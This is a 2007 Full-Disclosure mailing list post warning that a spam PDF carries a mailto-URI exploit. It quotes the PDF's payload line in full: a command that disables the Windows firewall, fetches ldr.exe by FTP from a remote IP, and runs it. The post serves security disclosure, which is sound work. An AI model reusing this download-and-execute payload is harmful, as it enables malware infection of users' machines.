[Full-disclosure] PDF mailto exploit in the wild
Paul Szabo
psz at maths.usyd.edu.au
Tue Oct 23 22:54:46 BST 2007
Dear 3APA3A,
> Messages like this I've got are PDF spam without attempt to exploit
> something, and are spammed since July. Not sure about this one though.
You seem to have missed the line
obj<</URI(mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/URI>>
within "my" PDF. Am not sure whether that would have worked, but is
unfriendly and not your average Viagra, sharemarket or porn message.
Some AV vendors recognize it, as shown by virustotal.
Cheers,
Paul Szabo psz at maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Full-Disclosure is hosted and sponsored by Secunia.